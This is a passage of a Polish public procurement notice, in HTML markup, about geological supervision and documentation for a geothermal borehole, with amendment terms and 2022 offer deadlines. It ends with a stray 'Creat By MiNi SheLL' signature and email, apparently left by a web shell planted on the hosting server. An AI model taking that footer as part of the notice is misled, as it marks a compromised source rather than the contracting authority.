innych obiektów budowlanych,<br/>d)	warunków pogodowych uniemożliwiających wiercenia,<br/>e)	wystąpienia usług dodatkowych; <br/>3)	zmiany osób skierowanych do realizacji zamówienia pod warunkiem, że nowe osoby będą spełniać wymagania określone dla nich przez Zamawiającego w SWZ, z tym że zmiany te będą możliwe, jeżeli zastępujące osoby wykażą nie mniejsze doświadczenie zawodowe niż ocenione doświadczenie zawodowe osób pierwotnie wyznaczonych do realizacji zamówienia; <br/>4)	zmiany harmonogramu rzeczowego na wniosek Zamawiającego lub na uzasadniony wniosek wykonawcy;<br/>5) działania siły wyższej, w tym z przyczyn spowodowanych stanem epidemii w kraju;<br/>6)	ustawowej zmiany wysokości podatku od towarów i usług VAT.<br/>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron w formie pisemnej zastrzeżonej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://inowroclaw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający ustala końcowy termin wykonania przedmiotu zamówienia na 29.02.2024 r., z tym że wykonawca będzie zobowiązany wykonać wymienione niżej usługi w następujących terminach:<br/>1)	opracowanie części dokumentacji postępowania o udzielenie zamówienia publicznego, o którym mowa w ust, 2 pkt 1 - do 2 miesięcy od dnia zawarcia umowy;<br/>2)	sprawowanie kompleksowego nadzoru nad wykonaniem prac przygotowawczych, w szczególności w zakresie ich zgodności z Prawem geologicznym i górniczym (Dz.U.2022, poz.1072) oraz merytoryczne doradztwo podczas wyboru przez Zamawiającego wykonawcy robót wiertniczych – od dnia zawarcia umowy do dnia wyboru wykonawcy robót wiertniczych;<br/>3)	sprawowanie nadzoru geologicznego podczas wykonywania wszelkich prac <br/>i robót określonych w projekcie robót geologicznych z dokonywaniem bieżącej analizy faktycznych wyników badań, testów i informacji pozyskanych w trakcie głębienia otworu geotermalnego, a w przypadkach tego wymagających proponowaniem <br/>i po uzgodnieniu z Zamawiającym wprowadzaniem koniecznych modyfikacji prac i robót określonych w wyżej wymienionym projekcie robót geologicznych wraz z dodatkiem – od rozpoczęcia robót wiertniczych, o którym Zamawiający powiadomi pisemnie wykonawcę z 7- dniowym wyprzedzeniem do ich zakończenia;<br/>4)	sprawowanie dozoru geologicznego w systemie wielozmianowego ruchu ciągłego podczas wykonywania wszelkich prac i robót określonych w projekcie robót geologicznych oraz wynikających z modyfikacji wprowadzonych przez nadzór geologiczny wraz z przekazywaniem nadzorowi geologicznemu wszelkich bieżących informacji i raportów dobowych dokumentujących wykonane roboty, prace, testy, pomiary i badania - od rozpoczęcia robót wiertniczych, o którym Zamawiający powiadomi pisemnie wykonawcę z 7- dniowym wyprzedzeniem do ich zakończenia;<br/>5) wykonanie laboratoryjnych badań prób – do 2 miesięcy od zakończenia prac terenowych;<br/>6)	opracowanie dokumentacji otworowej – do 3 miesięcy od zakończenia prac terenowych;<br/>7)	opracowanie dokumentacji hydrogeologicznej – do 5 miesięcy od zakończeniu prac terenowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com